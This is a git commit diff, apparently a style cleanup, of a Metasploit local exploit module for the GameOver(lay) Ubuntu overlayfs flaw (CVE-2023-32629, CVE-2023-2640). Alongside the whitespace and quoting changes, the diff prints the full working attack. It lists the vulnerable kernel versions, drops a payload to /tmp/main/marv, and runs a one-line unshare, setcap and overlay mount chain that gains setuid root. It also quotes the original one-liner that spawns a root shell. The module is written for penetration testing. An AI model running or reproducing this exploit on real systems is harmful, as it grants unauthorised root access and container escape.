Merge branch 'game_overlay'

Corey · Corey · commit af91d9766c13 · 2024-09-11T12:53:20.000-04:00
merge game_overlay rubocop
diff --git a/modules/exploits/linux/local/game_overlay_privesc.rb b/modules/exploits/linux/local/game_overlay_privesc.rb
@@ -1,10 +1,10 @@
 class MetasploitModule < Msf::Exploit::Local
- 
+
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Post::Linux::System
   include Msf::Post::Linux::Kernel
   include Msf::Post::File
-  include Msf::Exploit::FileDropper 
+  include Msf::Exploit::FileDropper
   include Msf::Exploit::CmdStager
 
   def initialize(info = {})
@@ -13,14 +13,14 @@ def initialize(info = {})
         info,
         'Name' => 'GameOver(lay) Privilege Escalation and Container Escape',
         'Description' => %q{
-            This module exploits the use of unsafe functions in a number of Ubuntu kernels 
-            utilizing vunerable versions of overlayfs. To mitigate CVE-2021-3493 the Linux 
-            kernel added a call to vfs_setxattr during ovl_do_setxattr. Due to independent 
-            changes to the kernel by the Ubuntu development team __vfs_setxattr_noperm is 
-            called during ovl_do_setxattr without calling the intermediate safety function 
-            vfs_setxattr. Ultimatly this module allows for root access to be achieved by 
-            writing setuid capabilities to a file which are not santiized after being unioned 
-            with the upper mounted directory. 
+          This module exploits the use of unsafe functions in a number of Ubuntu kernels
+          utilizing vunerable versions of overlayfs. To mitigate CVE-2021-3493 the Linux
+          kernel added a call to vfs_setxattr during ovl_do_setxattr. Due to independent
+          changes to the kernel by the Ubuntu development team __vfs_setxattr_noperm is
+          called during ovl_do_setxattr without calling the intermediate safety function
+          vfs_setxattr. Ultimatly this module allows for root access to be achieved by
+          writing setuid capabilities to a file which are not santiized after being unioned
+          with the upper mounted directory.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -40,9 +40,9 @@ def initialize(info = {})
           ['CVE', '2023-32629'],
           ['CVE', '2023-2640']
         ],
-      'Targets'         => [ [ 'Linux', {} ] ],
-      'Arch'           => [ ARCH_X86, ARCH_X64 ],
-      'CmdStagerFlavor' => 'bourne' 
+        'Targets' => [ [ 'Linux', {} ] ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'CmdStagerFlavor' => 'bourne'
       )
     )
     register_options [
@@ -54,21 +54,21 @@ def initialize(info = {})
   def vuln
     # Keys are ubuntu versions, vals is list of vunerable kernels
     {
-        "Lunar Lobster": %w[6.2.0], # Ubuntu 23.04
-        "Kinetic Kudu": %w[5.19.0], # Ubuntu 22.10
-        "Jammy Jellyfish": %w[5.19.0 6.2.0], # Ubuntu 22.04 LTS
-        "Focal Fossa": %w[5.4.0], # Ubuntu 20.04 LTS 
-        "Bionic Beaver": %w[5.4.0], # Ubuntu 18.04 LTS      
-    }.transform_keys! {|k| k.to_s} # w/o this key will be :"Bionic Beaver" 
-  end 
+      "Lunar Lobster": %w[6.2.0], # Ubuntu 23.04
+      "Kinetic Kudu": %w[5.19.0], # Ubuntu 22.10
+      "Jammy Jellyfish": %w[5.19.0 6.2.0], # Ubuntu 22.04 LTS
+      "Focal Fossa": %w[5.4.0], # Ubuntu 20.04 LTS
+      "Bionic Beaver": %w[5.4.0] # Ubuntu 18.04 LTS
+    }.transform_keys!(&:to_s) # w/o this key will be :"Bionic Beaver"
+  end
 
   def check
     fail_with(Failure::NotVulnerable, 'Target is not linux') unless session.platform == 'linux'
 
-    # Must be Ubuntu 
-    fail_with(Failure::NotVulnerable, "Target is not Ubuntu.") unless kernel_version =~ /[uU]buntu/ 
+    # Must be Ubuntu
+    fail_with(Failure::NotVulnerable, 'Target is not Ubuntu.') unless kernel_version =~ /[uU]buntu/
 
-    os = cmd_exec "cat /etc/os-release"
+    os = cmd_exec 'cat /etc/os-release'
 
     # grab codename i.e. Focal Fossa
     codename = os.scan(/\(\w* \w*\)/)[0]
@@ -87,18 +87,18 @@ def check
     # will this return in correct context??
     # could scan kernel to prevent looping if return below doesn't work
     vuln[codename].each do |version|
-        if kernel.include? version  
-            return CheckCode::Vulnerable "#{codename} with #{kernel} kernel is vunerable"
-        end 
+      if kernel.include? version
+        return CheckCode::Vulnerable "#{codename} with #{kernel} kernel is vunerable"
+      end
     end
   end
 
-  def execute_command(cmd, opts = {})
-    payload_file = datastore['PayloadFilename']
+  def execute_command(_cmd, _opts = {})
+    datastore['PayloadFilename']
 
-    payload_dir = datastore['PayloadDir']
+    datastore['PayloadDir']
 
-    directories = %w[l u w m].flat_map {|e| "/tmp/main/#{e}"}
+    directories = %w[l u w m].flat_map { |e| "/tmp/main/#{e}" }
 
     # Should we make sure directory doesn't already exist?
 
@@ -108,20 +108,18 @@ def execute_command(cmd, opts = {})
     end
     # register_dir_for_cleanup "/tmp/main/"
 
+    write_file '/tmp/main/marv', generate_payload_exe
+    # works move test to low, run unshare mount set cap, shell
 
-   write_file "/tmp/main/marv", generate_payload_exe
-   #works move test to low, run unshare mount set cap, shell
-
-   print_status "Starting new namespace, and running exploit..."
+    print_status 'Starting new namespace, and running exploit...'
 
-   hack = "unshare -rm sh -c \"cp /u*/b*/p*3 /tmp/main/l/; setcap cap_setuid+eip /tmp/main/l/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/main/l,upperdir=/tmp/main/u,workdir=/tmp/main/w /tmp/main/m && touch /tmp/main/m/*\" && /tmp/main/u/python3 -c 'import os;os.setuid(0);os.system(\"chmod 4755 /tmp/main/marv && /tmp/main/marv\")' "
+    hack = "unshare -rm sh -c \"cp /u*/b*/p*3 /tmp/main/l/; setcap cap_setuid+eip /tmp/main/l/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/main/l,upperdir=/tmp/main/u,workdir=/tmp/main/w /tmp/main/m && touch /tmp/main/m/*\" && /tmp/main/u/python3 -c 'import os;os.setuid(0);os.system(\"chmod 4755 /tmp/main/marv && /tmp/main/marv\")' "
 
-    # g1vi original 
-    # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'" 
+    # g1vi original
+    # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'"
     print_status "Running exploit: '#{hack}' "
     puts cmd_exec_with_result(hack)
-
-  end 
+  end
 
   def exploit
     execute_cmdstager
